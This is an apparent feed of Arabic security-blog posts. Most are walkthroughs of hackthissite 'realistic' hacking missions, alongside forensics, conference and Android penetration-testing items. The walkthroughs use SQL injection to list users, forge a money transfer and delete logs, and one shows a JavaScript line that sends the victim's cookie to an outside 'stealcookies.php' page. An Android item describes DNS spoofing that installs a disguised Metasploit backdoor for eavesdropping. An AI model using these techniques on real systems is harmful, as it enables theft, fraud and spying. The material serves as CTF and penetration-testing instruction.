أحفظ هذه المعلومة في ملف باسم “myfile” مثلا، ومن ثم باستعمال الأداة الشهيرة على لينيكس: john the ripper تستطيع فك تشفير الكلمة. وذلك باستعمال الأمر:

john myfile

الآن أذهب إلى صفحة الأدمن وقم بإدخال اسم المستخدم كـ: administrator وأدخل كلمة المرور بعد فكها.

 

ملحق:

لماذا قمنا بكتابة العنوان وكأن الملف الحالي هو root وليس images!؟

لا يهم هنا كثيرا أين موقع showimages.php الحالي، الأهم هو كيف يعرض الملفات. جرب أن تدخل على أحد تلك الملفات، كالموجودة في هذا الرابط مثلا:

https://www.hackthissite.org/missions/realistic/7/images/patriot.txt

ستجد أنه لا وجود للصفحة!

ولكن جرب:

https://www.hackthissite.org/missions/realistic/7/patriot.txt

ستجد الملف! إذن الصفحة تأخذ الملفات من الـ root وليس من المجلد images. كما وأنه عندما قمنا بعرض ما في مجلد images لم يكن يحتوي على أي من الملفات التي تقوم showpages.php بعرضها.

مقال : حل التحدي الثامن من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic:8 (United Banks Of America)

الصعوبة: صعبة

الرابط: https://www.hackthissite.org/playlevel/8/

المهمة: أحد الأغنياء قام بوضع 10,000,000$ في البنك للتبرع بها لحساب حملة تهدف إلى القضاء على المخترقين وملاحقتهم. يجب أن نمنع هذا.

الرسالة: أهلا. الرجل الذي يُدعى Gary Hunter أحد أغنى أغنياء أمريكا قام بوضع 10,000,000$ في حسابه في البنك ليقوم بتحويلها إلى منظمة تُعنى بملاحقة المخترقين (hackers) في كل العالم! حاولت أن أخترق موقعهم ولكن لم أستطع هذا. من فضلك قم بعمل الآتي:

1. ابحث عن حساب Gary Hunter . (أنا لا أعلم اسم حسابه في البنك)

2. حول من حسابه 10,000,000$ إلى حساب: dropCash

3. قم بتغطية آثارك من خلال مسح سجلات الموقع (the logs)، ستجدها في مجلد “logFiles”

 

اذهب الآن وحاول أن تحل المشكلة.

 


 

التلميح الأول:
ابحث عن SQL Injection لتقوم بعرض كل أصحاب الحسابات في الموقع.

 

التلميح الثاني:
جرب إدخال ‘ في صفحة User Info، مالرسالة التي تظهر؟

 

التلميح الثالث:
ستجد أن وصف Gary Hunter المطلوب هو : — $$$$$ –

 

التلميح الرابع:
سجل في الموقع وبعد الدخول إلى حسابك جرب عملية الإيداع! ماذا تلاحظ؟

 

التلميح الخامس:
غير القيم التي تعلم في طلب التحويل واترك كلمة المرور كما هي. ماذا حدث؟

 

التلميح السادس:
لمحو سجلات الموقع، جرب التعديل على أيقونة “Clear Files In Personal Folder”.

 

الحل:

أول ما نريد فعله هو البحث عن اسم المستخدم، ومن الصعب تخمينه. أفضل الإحتمالات هو الحصول على SQL Injection. بقليل من البحث في مدخلات الموقع ستلاحظ أنك إذا قمت بإدخال ‘ في صفحة User Info ستظهر رسالة تقول إن السيرفر لم يجد ما تبحث عنه في الجدول “users”. عرفنا الآن اسم الجدول الذي نريد، ونتوقع أن هذه الصفحة تحتوي على SQL Injection Vulnerability. بقليل من البحث سنجد أننا إذا قمنا بإدخال ‘ OR 1=1/* سيظهر جميع مستخدمي الموقع، وبالإطلاع عليهم ستجد ان اسم المستخدم الذي نريد هو: GaryWilliamHunter

لمعرفة لماذا قمنا بهذا ولرؤية أمثلة أكثر عن SQL Injection راجع التحدي الثاني و الرابع.

 

قد تفكر الآن أن تذهب وتحاول طريقة الـ Brute Force Attack باستخدام اسم المستخدم الذي حصلت عليه، ولكن كما قلنا سابقا، فإن استخدام هذا النوع من الهجوم ممنوع في التحدي.

دعنا الآن نقوم بالتسجيل في الموقع والدخول إلى حسابنا لملاحظة كيف يتم التحويل، وكيف يتحقق الموقع من هوية المستخدم.

باستخدام Tamper Data في فايرفوكس، سنلاحظ أن الـ cookie تُرسل بدون تشفير! ويتم إرسال اسم المستخدم وكلمة المرور. وأيضا يتم إرسال المُحول إليه ومبلغ التحويل باستخدام POST.

hackthissite - realistec - 8 - 1

لنجرب تغيير المعلومات أعلاه ما عدا كلمة المرور لإنها ليست لدينا، ولنأمل أن يكون مطور الموقع قد نسي التحقق من كلمة المرور. وبعد التغيير سيصبح الشكل كالآتي:

hackthissite - realistec - 8 - 2

نجحت المحاولة! انتهينا من أول مهمتين. بقيت المهمة الأخيرة، وهي محو آثار ما فعلناه. كما ذُكر في الرسالة، كل ما علينا فعله هو محو المجلد logFiles.

عند تسجيل دخولك إلى حسابك ستجد أن هناك أيقونة تقوم بمسح كل الملفات التي في المجلد الخاص بالمستخدم. بالتأكيد لن تُفيدنا كما هي، فنحن نريد مسح ما في المجلد logFiles.

بالإطلاع على الأيقونة باستخدام Inspect Element ستجد أن هناك أيقونة مخفية تحوي القيمة qazwsx123SQLFiles. لنجرب تغييرها إلى القيمة التي نريد وهي: logFiles. ومن ثم نضغط على الأيقونة. وها قد انتهينا والحمد لله :)

ملحق:

رابط لـ Tamper Data:

https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

فيديو : شرح استخدام اداة FTK imager

$
0
0

في هذا الفيديو قمت بشرح استخدام اداة FTK imager المتخصصة في اخذ صورة من النظام لعملية التحقيق الجنائي الرقمي والتحقق من الصورة عن طريق مطابقة الهاش الخاص بالقرص والصورة الماخوذة من النظام كذلك يمكننا بواسطة الاداة اخذ كذلك صورة من الرام وحفظها لتحليلها بأدوات التحقيق الجنائي الرقمي .

 

 

تحميل الاداة

مقال : حل التحدي التاسع من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic:9 (CrappySoft Software)

الصعوبة: معتدلة

الرابط: https://www.hackthissite.org/playlevel/9/

المهمة: رئيس شركة CrappySoft توقف عن إعطاء المرتبات لموظفيه، ساعدهم ليحصلوا على ما يستحقون.

الرسالة: مرحبا، أحتاج إلى مساعدتك. رئيس الشركة التي أعمل بها توقف عن إعطائي المرتبات! هل تستطيع مساعدتي للحصول على مرتبي؟ تستطيع الوصول إلى موقعهم من هنا. الشركة تملك نظام على موقعهم لدفع المرتبات، ولكن رئيس الشركة هو فقط من يستطيع استخدامه.

ليست لدي معلومات عن حسابه، ولكن هذا هو حسابي في الموقع:

اسم المستخدم: r-conner@crappysoft.com

كلمة المرور: ilovemywork

 

اذهب الآن وحاول أن تحل المشكلة.


 

التلميح الأول:
أذهب إلى صفحة الدفع ولاحظ الـ cookie.

 

التلميح الثاني:
لماذا لا تسرق الـ cookie من المدير؟ برسالة ربما.

 

التلميح الثالث:
لا تنسى تغطية آثارك بعد الإنتهاء من دفع المرتبات.

 

التلميح الرابع:
أبحث أين تُحفظ سجلات الموقع، ومن ثم فكر كيف “تمسحها”..

 

الحل:

دعونا أولا نجرب نظام الدفع الآلي لديهم. سجل الدخول بالمعلومات المُعطاه في الرسالة ومن ثم حاول دفع الرواتب من خلال الضغط على Pay Salaries

سترى رسالة تقول أنك لست المدير.

لنرجع خطوة إلى الوراء، كيف يعرف الموقع أنك الشخص أ ولست الشخص ب مثلا؟ هناك عدة طرق من أشهرها استخدام الـ cookie.

إذن لنحاول رؤية مالذي تحتويه cookie هذا الموقع. هناك العديد من الأدوات، سأستخدم FireCookie.

hackthissite - realistec - 9 - 1

إذن نحتاج إلى كلمة المرور واسم المستخدم. هناك العديد من الطرق للحصول عليهم، أحدها هو XSS. لاحظ أنك تستطيع إرسال رسالة خاصة إلى المدير! فلماذا لا تُرسل له رسالة للحصول على الـ cookie الخاص به. المشكلة في هذه الطريقة أنك بحاجة إلى موقع على الإنترنت لترسل إليها الـ cookie. لكنا سنجرب ونضع موقع غير صحيح. الـرسالة التي سنرسلها ستكون كما يلي:


javascript:void(window.location='http://www.mywebsite.com/stealcookies.php?var='+document.cookie);

هذا السطر سيستخدم الجافا سكريبت لإرسال الـ cookie الخاصة بالمدير إلى الرابط http://www.mywebsite.com/stealcookies.php

من خلال استخدام GET method

عندما تُرسل الرسالة سيخبرك الموقع أن XSS ليست الهدف من هذا التحدي، لهذا سيعطيك البيانات مباشرة. هذا سيسهل علينا كثيرا.
الآن تملك اسم المستخدم، وكلمة المرور للمدير. نذهب الآن لنعدل على الـ cookie الخاصة بنا باستخدام نفس الأداة التي استخدمناها سابقا (Fire Cookie)

hackthissite - realistec - 9 - 2

نذهب الآن إلى صفحة Pay Salaries ونقوم بدفع الراتب لصديقنا.

حين تقوم بدفع الراتب، سيظهر لك تلميح جديد. يقول لك:

شكرا لإنك دفعت لي الراتب، أنا أدين لك. لا تنسى أن تمحو السجلات من خلال نظام الـ subscribing.

ماذا يقصد؟

لنذهب إلى Mailing List  والتي تحتوي على نظام الـ subscribing ونقرأ ما كُتب هناك.

يقول: حين تقوم بإدخال أي مدخل، يقوم الموقع بكتابته أولا في الملف ثم يقوم بعدها بالتأكد من كل القائمة البريدية للتأكد إذا كان هناك أي مدخل بدون @ ليقوم بمسحه!

إذن لو استطعنا أن نجد الملف الذي تُحفظ فيه السجلات ومن ثم قمنا بتمريره هنا، سيقوم بمسح كل السطور لإنها لن تحتوي على @ وهذا بالضبط ما نريد.

بالضغط على Inspect Element لأيقونة “Subscribe”، سنجد أن هناك أيقونة مخفية تحتوي على “./files/mailinglist/addresses.txt” كقيمة لها!

hackthissite - realistec - 9 - 3

لنجرب الدخول على الملف files من خلال الرابط:

https://www.hackthissite.org/missions/realistic/9/files/

ستجد قائمة بجميع ما في المجلد، أدخل على logs ومن ثم logs.txt

هذا هو الملف الذي نريد.

نرجع الآن إلى Mailing List ونقوم بتغيير قيمة الأيقونة المخفية إلى: “./files/logs/logs.txt” لتقوم بمسح الملف الذي نريد.

hackthissite - realistec - 9 - 4

قم الآن بإدخال ما تريد في خانة الإيميل، واضغط على: Subscribe!

تم الحل والحمد لله.

ملحق:

ما هو الـ cookie.

الـ cookie هو عبارة عن مجموعة من المعلومات تُحفظ في متصفح المستخدمين ليتمكن الموقع من معرفة من الذي يتحدث معه.

ما رابط تحميل Fire Cookie

Fire Cookie موجودة داخل Firebug في فايرفوكس. هذا هو الرابط:

https://addons.mozilla.org/en-US/firefox/collections/jbalogh/firebug_addons/


فيديو : تقنيات الحماية من ثغرات Buffer overflow , الدرس الثالث

$
0
0

BOx-BOFفي هذا الفيديو تحدثت عن تقنيات الحماية في لثغرات Buffer overflow مثل حماية SEH وطرق تخطيها .

 

 

وإن شاء الله في الفيديوهات القادمه من الدورة سوف نتطرق إلى مواضيع متقدمة وإحترافيه أكثر في ثغرات Buffer overflow تنقلك إلى مرحلة جيدة في ثغرات Buffer overflow.

ملاحظة :

يجب عليك متابعة الدروس السابقة لدورة استغلال ثغرات Buffer overflow من هنا

مقال : مبدأ عمل حماية Android Pattern

$
0
0

تكلمنا في دروس سابقة عن بعض الأمور التي تخص إختبار إختراق أنظمة Android , أما اليوم سوف نتحدث عن أسلوب معين يتم فيه حماية الوصول إلى نظام Android وهو أسلوب Android Pattern وهي عبارة عن شاشة يوجد بها 9 نقاط يقوم المستخدم برسم شكل معين عليها دلالة على أنه صاحب الجهاز لكي يتمكن إلى الدخول إلى نظام Android , ويعتبر هذا الأسلوب من أكثر الأسايب الشائعة لحماية الوصول إلى أنظمة Android واليوم بإذن الله سوف نتحدث عن مبدأ عمل هذه الحماية أو هذا الأسلوب ومن ثم سوف يتبع هذا المقال بشرح أخر يتحدث عن كيفية فك هذه ال Pattern لكي تتمكن من الوصول للجهاز بكل سهولة.

حسناً , يجب علينا قبل البدء بإختبار إختراق أي نظام أن نكون على معلومية كافية بكيفية عمل هذا النظام لكي نتمكن لاحقاً من إختبار إختراقه لذلك يجب علينا تحليل ألية عمل هذا الأسلوب وكيفية عمله داخل الجهاز بشكل دقيق لكي نتمكن من إختبار إختراقه , طبعاً ألية العمل بسيطه جداً وتعتمد على تحويل الرسوم إلى أحرف وتشفيرها وحفظها في مكان معين داخل النظام لكي يتم مطابقتها لاحقاً مع أي مدخلات للمستخدم فهي تشبه تماماً طريقة عمل أنظمة تسجيل الدخول حيث يتم كتابة البريد وكلمة المرور ومن ثم يتم تشفير هاش كلمة المرور ومطابقته مع ما هو موجود في قاعدة البيانات وعليه تتم عملية تسجيل دخول ناجه وفقاً لمجموعة من البيانات الصحيحه التي تم إدخالها بشكل صحيح وحقيقي من المستخدم إلى النظام.

وهذه الصورة توضح ما هو Android Pattern :

main_pattern

السنياريو بسيط جداً ولا يحتاج إلى شرح كبير دعونا نبدأ فوراً بتفسير وتحليل هذا الأسلوب ونبدأ اولاً بوضع Pattern خاصه بنا من خلال الذهاب إلى Settings ثم Security ثم Set up screen lock ونختار منها Pattern كما هو موضح بالصورة :

main_security

بعد الدخول إلى تبويب Pattern نقوم برسم الرسمه التي نريدها عبر هذه النقاط :

pattern_draw

وهنا شكل الرسمه التي قمنا برسمها وسوف يعتمدها نظام Android عند محاولة الدخول للنظام :

Pattern_L

الأن في كل مره سوف نحاول الدخول للنظام سوف نقوم برسم حرف L للنظام لكي يتأكد من ملكيتنا للهتاف ومن ثم يقوم بإدخالنا.

حسناً ,  إذاً في كل مرة سوف نحاول الدخول للنظام سوف نقوم برسم هذه الرسمة فكيف يقوم Android بالتحقق منها ؟ هل يقوم بعمل بعض السحر للتعرف على هذه الرسمة :D ؟ أم أنه يحفظ هذه الصورة يقوم بطابقتها عبر تقنيات خاصه ومعقده جداً ؟ الجواب أبسط جداً مما تظنون , حيث يقوم Android بتحويل الرسمه إلى مجموعة من الأرقام لها ترتيب معين وثابت ويتغير وفقاً لطريقة رسمك للرسمة حيث تنقس الشاشة السابقة إلى 9 دوائر يبدأ Android بترقيم الدوائر من 0-8  بهذا الشكل :

pattern_draw_count

كما نرى بهذه الطريقة يتم تحويل الرسمه إلى أحرف بناءاً على ترتيب اللمسات التي تعتمد عليها الرسمة ويتم حفظها على شكل أرقام مرتبه , في حالتنا يتم حفظ الرسمة بالأرقام التالية بناءاً على الضغطات بالتوالي :

8 – 7 – 4 – 1

تقرأ من اليسار إلى اليمين 1 ثم 4 ثم 7 ثم 8 أي 1478

حسناً بعد تحويل الرسمة إلى أرقام يتم حفظها بشكل مشفر بطريقة خاصة عوضاً عن حفظها بشكل مباشر , ويتم حفظها بطريقة معينه سوف نتحدث عنها لاحقاً اثناء محاولة كسر هذه الحماية.

إذاً هذا ما يحصل فعلياً عن إدخال الرسمة الخاصه بك :

pattern_draw_count

 

يتم إدخال الرسمة على شكل أرقام ويتم معاينتها بطريقة معينه مع ما هو موجود ومحفوظ بالنظام , وببساطه تتم هذه العملية.

إلى هنا نكون إنتهينا في مقالنا هذا وإن شاء الله سوف يكون هنالك جزء ثاني نتحدث فيها عن كيفية كسر هذه الحماية عن قريب بإذن الله.

كتاب : Windows Forensic Analysis Toolkit

$
0
0

نظام Windows اكثر انظمة التشغيل انتشار في جميع انحاء العالم والمستخدم من الملايين من الناس كنظام سطح مكتب او سيرفر  فنسبة نظام تشغيل وندوز من عالم السيرفرات ليست بالقليلة . وهذا يجعله الهدف الأول قبل الانظمة الاخرى لأستهدافة ومحاولة اختراقة وبرمجة الفايروسات لنظام وندوز  بسبب ان الهجمة او الفايروس الواحد سوف يصاب به الملايين من الاجهزة , ايضا نسبة الجرائم الالكترونية على نظام وندوز سوف تزداد وهذا طبيعي جدا لأي نظام يشتهر ويعتبر الاكثر استخدام وانتشار تتوجه اليه الجهود لمحاولة اختراقة وايجاد الثغرات  واستغلالها .

نتائج هذه الجرائم والهجمات والفايروسات التي يصاب بها نظام وندوز تحتاج الى خبراء في تحليل النظام ومراقبة حالة النظام والتحقيق في عمليات الاختراق التي قد يتعرض اليها نظام وندوز .

كتاب : Windows Forensic Analysis Toolkit  من الكتب الجميلة التي تحدثت عن تقنيات التحليل لنظام وندوز باستخدام اداوات مجانية ومفتوحة المصدر وهذه نقطة مهمة جدا , خاصة في مجال التحقيق الجنائي الرقمي هناك اداوات تجارية كثيرة ومرتفعة الاسعار , لذلك يجب علينا تشجيع ودعم الادوات المفتوحة المصدر في هذا المجال .

نسخة هذا الكتاب , النسخة الرابعة المخصصه لنظام تشغيل windows 8 التي تغطي العديد من الجوانب التي تم كتابتها من الميدان والحياة العملية للكاتب  Harlan Carvey  كذلك للكاتب مجموعة من الكتب التي قام بكتابتها مثل Windows Forensic Analysis Toolkit  بأربع نسخ التي ركزت على نظام وندوز اكس بي ثم seven ثم اخر نسخه حاليا ,  وهي هذه النسخة الرابعة المخصصة لنظام windows 8 .

اتمنى لكم كل التوفيق .

رابط الكتاب على امازون

amazon

مقال : مؤتمر Cairo Security Camp 2014

$
0
0

اعزائي زوار واعضاء مجتمع isecur1ty . اليوم احببت ان اتحدث عن مؤتمر Cairo Security Camp المختص بأمن المعلومات والذي يعُقد كل عام بمصر .

يُعد مؤتمر Cairo Security Camp من اقوي المؤتمرات المختصه بمجال أمن المعلومات في الشرق الاوسط والاول في مصر حيث يجمع عدد كبير من الموهوبين والمحترفين في المجال لنشر المعرفه .

يتكون الحدث من مجموعه من الفعاليات والتدريبات التي تتم في فترة الحدث .

Screenshot from 2014-09-03 01:40:00

اولا : التدريبات

حيث يوفر Cairo Security Camp مجموعه من التدريبات في مجال امن المعلومات ( اختبار الاختراق الانظمه الصناعيه – اختبار الاختراق المتقدم – اختبار اختراق انظمة الاندوريد و IOS ) علي ايدي مجموعه من المحترفين والخبراء في المجال .

1 – تدريب اختبار اختراق الانظمه الصناعيه والمدمجه:

Assessing and Exploiting Control Systems with SamuraiSTFU

speakers-10

يقدم هذا التدريب Justin Searl ويحتوي هذا التدريب علي ” اختبار اختراق الانظمه الصناعيه والمدمجه وبروتوكولات الاتصالات المختلفه لها “

2 – تدريب تطوير الاستغلال لانظمة الاندرويد و IOS

Advanced Android and IOS Hands-on Exploitation

speakers-61

يقدم هذا التدريب Aseem Jakhar

3 – تدريب اختبار الاختراق المتقدم

Advanced Penetration Tester

speakers-62

يقدم هذا التدريب Joe Mccray

ثانيا : مسابقة CTF

اذا كنت من هواة كسر الحمايات والتحديات الصعبه فيجب الا يفوتك مثل تلك المسابقه التي تُعقد كل عام في خلال الحدث ويتجمع فيها عدد كبير من الهاكرز للمنافسه علي المراكز الاولي والحصول علي جوائز قيمه

جوائز مسابقة CTF
جوائز مسابقة CTF

ثالثا : المؤتمر

يضم المؤتمر مجموعه كبيره من المتحدثين المحترفين في مجال امن المعلومات والكثير من المواضيع القويه التي يتم عرضها في المؤتمر .

العقيد/عبد الرحمن من وزارة الداخليه المصريه قسم مكافحة الجرائم المعلوماتيه
العقيد/عبد الرحمن من وزارة الداخليه المصريه قسم مكافحة الجرائم المعلوماتيه
10609704_827808187239868_4383275244600601455_n
مؤتمر CSCamp عام 2012

سيكون من ضمن المتحدثين هذا العام Chris Evans  باحث بامن المعلومات بشركة Google

Chris Evans , Google
Chris Evans , Google

سيقام الحدث هذا العام بجامعة النيل المبني الجديد بالشيخ زايد , 6 اكتوبر .

ميعاد الحدث : 25-29 نوفمبر 2014

تكلفة تذاكر الحدث
تكلفة تذاكر الحدث

للاشتراك يمكنكم زيارة موقع الحدث من الرابط التالي :

http://cairosecuritycamp.com/index.php

فيديو : إختبار إختراق Android والتجسس على الأصوات والمكالمات

$
0
0

تكلمنا مسبقاً عن بعض الأمور التي تتعلق بإختبار إختراق نظام Android واليوم سوف نشرح سيناريو تزيف صفحات الإنترنت لأجهزة Android داخل الشبكة ومن ثم إختراقها من خلال مشروع Metasploit وتحويل جهاز Android إلى جهاز تنصت للتنصت على المكالمات والأصوات المحيطه بالجهاز , حيث قمت بعمل هجوم Dns_Spoof على الشبكة الداخلية ومن ثم قمت بعمل صفحه بسيطه تجبر المستخدم على تحميل ملف مزيف يقوم بتشغيل الإنترنت ولكنه بالأصل هو BackDoor يقوم بعمل إتصال عكسي معي.

 

 

طبعاً هذه الصور هي صور الأمور التي ظهرت للمستخدم بجهاز Android وما قام به أيضاً من تحميل وتنفيذ وقمت بالتنويه على أنني سوف أرفق هذه الصور بالمقال :

هذه الصورة تظهر كيفية تحويل طلب google.com إلى الصفحه الملغومة الخاصه بنا :

 

google_spoofed

وهذه الصورة أيضاً تظهر كيفية تحويل طلب isecur1ty.com إلى الصفحه الملغومة :

isecur1ty_spoofed

وهذه الصورة أيضاً تظهر تحميل Payload فور الضغط على زر تحميل متصفح الإنترنت :

backdoor_downloaded

وهذه الصورة تظهر تشغيل Payload بعد تنصيبه :

backdoor_run

أتمنى أن يكون الفيديو مفيد لكم وإن شاء الله سوف يكون هنالك المزيد من الأمور المتعلقه بإختبار إختراق Android بشكل أكثر تعمق :)

Viewing all 466 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>